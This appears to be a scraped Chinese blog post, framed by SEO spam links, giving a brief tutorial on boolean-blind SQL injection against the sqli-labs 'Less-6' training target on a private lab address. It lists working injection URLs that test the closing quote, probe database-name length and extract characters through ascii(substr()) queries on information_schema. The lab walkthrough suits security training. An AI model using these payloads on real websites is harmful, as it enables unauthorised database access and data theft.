当前位置: 首页 > news >正文

商城网站开发 价格百度旗下有哪些app

商城网站开发 价格,百度旗下有哪些app,云阳网站建设,python做网站 框架简介 SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中&am…

简介
   

        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       SQL注入的一个简要流程:

1、打开目标靶场

 2、选择less - 6

3、确定网站可以注入的参数

http://172.16.1.13/Less-6/?id= 

4、判断闭合方式   

 http://172.16.1.13/Less-6/?id=1" --+

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如: http://172.16.1.13/Less-6/?id=1" and length(database())>6--+

http://172.16.1.13/Less-6/?id=1" and length(database())>8--+

最终可以确定数据库名长度为8

6、确定数据库字符使用ASCII码

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面显示正常 说明数据库第一位字符ascii码大于114

http://172.16.1.13/Less-6/?id=1" and ascii(substr(database(),1,1))>120--+

最终可以确定第一位字符ascii码为115,确定为字母s

以此类推,最终可确定数据库名为 security

7、查询数据库中第一张表

查询第一张表的第一个字符

http://172.16.1.13/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全 

网络安全为人民,网络安全靠人民。

http://www.yidumall.com/news/79966.html

相关文章:

  • 网站做转链接违反版权吗合肥网站建设
  • 网站建设学校培训学校百度小说风云榜排名完结
  • 可信网站认证 服务中心营销型企业网站
  • 想要一个免费的网站合肥关键词排名优化
  • 在门户网站做产品单页多少钱一天深圳网络营销的公司哪家好
  • 自助建站模板下载网站优化排名易下拉系统
  • mui做浏览器网站跳转优化工具箱下载
  • 阜宁城乡建设局网站百度推广一年要多少钱
  • 设计网页的快捷网站怎么在百度上做推广上首页
  • 网站模板设计定制化服务台州做优化
  • ipv6改造 网站怎么做湖南长沙关键词推广电话
  • 男女做的那个真实的视频网站如何在百度上做推广
  • 求个没封的a站yw1129cm怎么找拉新推广平台
  • 做实体识别的网站最新中高风险地区名单
  • 专业开发网站公司关键词优化教程
  • 刷移动端seo软件win7优化极致性能
  • 有学给宝宝做衣服的网站吗百度热线电话
  • 日ip5000的网站怎么做如何推广自己的产品
  • 奇趣网做网站百度浏览器官网入口
  • 动态网站开发组合推广下载app拿佣金
  • 二手网站建设产品如何做网络推广
  • 12306网站开发时间seo引擎搜索入口
  • 做网站销售那里找客户网络的推广方式有哪些
  • 上海网站建设方案业务推广方式
  • 用群晖nas做网站seo流量优化
  • 如何做网站的软件济南做网站推广哪家好
  • 网页制作公司简介seo百家论坛
  • 什么是网站规划网站搜索引擎
  • 网站后台模板怎样使用网络销售管理条例
  • 树莓派做的网站网站定制设计